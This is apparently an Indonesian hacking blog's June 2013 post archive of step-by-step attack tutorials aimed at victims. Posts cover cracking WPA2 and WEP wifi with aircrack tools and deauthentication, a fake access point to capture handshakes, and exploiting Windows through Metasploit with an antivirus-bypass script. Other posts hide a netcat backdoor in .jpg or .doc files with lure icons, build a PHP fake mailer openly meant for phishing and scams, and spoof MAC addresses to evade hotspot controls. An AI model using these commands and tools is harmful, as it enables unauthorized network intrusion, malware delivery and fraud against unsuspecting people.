Posts

Showing posts from June, 2013

Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake

Image
oke langsung saja yapz  .  . buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng dengan menggunakan perintah airmon-ng start wlan0  ganti wlan0 dengan interface kalian setelah mode monitor aktik saatnya scanning korban airodump-ng mon0 target wifi dengan security wpa2 dengan essid =   trojanzboy@wifi channel = 3 setelah selesai menentukan korban sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface> ./wifi_honey.sh TrojanzBoy@wifi 3 wlan0 maka terciptalah wifi-wifi palsu dan tunggu hingga korban connect ke salah satu wifi  dan memasukkan password tunggu hingga dapat wpa handshake dari akses point yang aslinya maka wpa handshake yang asli pun kita dapatkan saatnya pengecrack kan hasil handshake buka terminal baru masuk directory dengan perintah   cd /pentest/wireless/wifi-honey setelah itu cek hasil capture

Exploit windows dengan Syringe bypass av

Image
disini saya akan mempraktekkan cara exploit windows dengan syringe inject pada ip publik biar seru tidak lagi pada local area ok langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1 lalu ekstrak pada DESKTOP maka terdapat dua file 1. syringe.sh 2. syfile.tar langsung saja buka terminal dan masuk ke desktop jangan lupa chomod 777 ya pada file syringe.sh setelah di chmod buka file syringe.sh dan rubah ip public kalian ip public saya = 125.164.221.221 ip local saya = 192.168.1.36 cara lihat ip public bisa masuk http://www.whatismyip.com/ edit syringe.sh setelah di setting saatnya beraksi balik lagi ke terminal tadi lalu ketikkan perintah ./syringe.sh dan tunggu hingga payload terbuka dan metasploit run automatic nah exploit selesai saatnya memforward ip local kita masuk ke modem router 192.168.1.1 masukkan password anda kita setting

Memanipulasi backdoor pada mp3,word jpg, dan ekstensi lainya

Image
sesuai judul disini kita akan menyisipkan backdoor pada .doc.mp3.jpg dan ekstensi lainya kita asumsikan netcat itu adalah backdoor/server kita langsung aja ya download dulu programnya  https://dl.dropboxusercontent.com/s/ui3evmrbp0k8g7u/Backdooring%20exec.rar?token_hash=AAG9YwfV4mAZgKm5RssDM_lBiusBdsMVDpCK9u5iNAWnWw&dl=1 setelah di download buka programnya 1. browse your server --> masukkan server backdoor disini saya contohkan netcat sebagai backdoor saya 2. pada file ekstensi isi ekstensi terserah kalian yang suport executable  misalnya .jpg 3. browse file --> cari file gambar pada drive anda yamg berekstensi .jpg 4. browse icon kita bisa buat icon semenarik mungkin agar korban terkecoh caranya masuk pada web  http://www.prodraw.net/favicon/index.php dan upload gambar yang ingin dijadikan icon lalu UPLOAD dan pilih resolusi dan generate  dan download 5. setelah memilih icon saatnya pilih hasil output keluaran inject disini saya taruh di desktop saja dan mulai menginjectkan

Membuat fake mail untuk penipuan , phising , SCAM dengan PHP

Image
Fake Mailer atau dalam istilah gaulnya fake email adalah teknik memanipulasi header email agar terbentuk email palsu untuk mengelabuhi penerima email. Teknik ini adalah satu fenomena perkembangan kemajuan teknologi informasi. Fake mailer ini juga bisa di kirim ke semua mail box penyedia layanan email seperti yahoo, gmail, hotmail dan lain sebagainya. Bahkan, anda bisa mengirimkan email atas nama teman anda serta nama samaran lainnya. Oke langsung saja kita mulai , sebelumnya saya akan kasih tau SC nya dulu Berikut SC nya, tapi tunggu dulu, sebelum anda menggunakan script ini anda harus mempunyai domain dan hostingan sendiri bisa buat hosting gratisan ataupun hasil curian alias deface download scriptnya di -->  https://dl.dropboxusercontent.com/s/gt5oxlysvlxs38z/massmail.rar?token_hash=AAGv8lyYIVyTBrihilxRIvYmEHZ7u8A_h5j6LVPzPcJ9ZQ&dl=1   screenshoot  keunggulan dari script ini kita bisa kirim banyak ke email sekaligus lihat dan send to inbox lalu dalam inbox email korban a

Hacking hotspot password wpa2-psk

Image
Setelah anda puas berhasil menghack WEP dengan Backtrack  kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA. ok langsung ya buka terminal pada backtrack lalu hidupkan mode monitornya disini interface saya wlan0 airmon-ng start wlan0  setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya ketikkan perintah airodump-ng mon0 terus cari wifi yang terkunci dengan enkripsi wpa2 disini saya akan menyerang wifi trojanzboy@wifi ketikkan perintah   airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0  ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)          -c 1 = channel yang digunakan broadcast hotspot           --bssid  94:0C:6D:EE:C2:3F = mac address hotspot           mon0= mode monitor interface Jika dibarisan bawah terdapat station client yang terhubung dengan AP selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ket

Hacking hotspot password wep

Image
tutor kali ini akan membaha tentang hacking wifi dengan security type wep ok langsung ya buka terminal pada backtrack lalu hidupkan mode monitornya disini interface saya wlan0 airmon-ng start wlan0  setelah aktif mode monitornya sekarang waktunya scanning wifi yang akan di bobol passwordnya ketikkan perintah airodump-ng mon0 terus cari wifi yan g terkunci dengan enkripsi WEP disini saya akan menyerang wifi trojanzboy@wifi setelah menentukan target langsung saja kita berhentikan scanningnya dengan menekan ctrl + c dan masukkan perintah airodump-ng -c 1 -w wep --bssid 94:0c:6d:ee:c2:3f mon0 keterangan -c        = channel korban bisa di lihat di keterangan pada scanningnya -w       = output hasil scanning disini saya namakan wep --bssid = mac address wifi korban mon0   = mode monitor nya setelah itu kita melihat data yang bertebaran pada wifi korban beserta beaconya setelah itu tekan shift + t untuk membuka tab baru pada terminal dan masukkan perintah aireplay-ng -1 0 -a 94:0c:6d:ee:c2:

Mengganti mac address pada linux backtrack

Image
apa itu mac address MAC (Medium Access Control) Address atau Physical Address adalah setara dengan nomor seri Kartu Jaringan (Network  Interface Card/NIC) . Setiap alamat MAC adalah unik yang panjangnya terdiri dari 48 bit. 24 bit pertama dari MAC Address merepresentasikan vendor pembuat kartu tersebut  dan 24 bit sisanya merepresentasikan nomor kartu tersebut.  Pada lapisan OSI ( Open System Interconnection ) MAC Address menempati lapisan Data Link Layer (layer kedua setelah Physical Layer ). ok kita langsung saja buka terminal dan kita cek dulu interface yang tersedia airmon-ng   Disini saya akan merubah mac address usb wifi saya yang mempunyai interface wlan0 sebelumnya kita down kan dulu interfacenya ifconfig wlan0 down  setelah itu mulailah merubah mac address nya disini say merubahnya 00:11:22:33:44:55 macchanger -m 00:11:22:33:44:55 wlan0 setelah itu kita hidupkan lagi denag perintah up ifconfig wlan0 up dan sukes cara ini bisa digunakan untuk mengakali hotspot yang memaka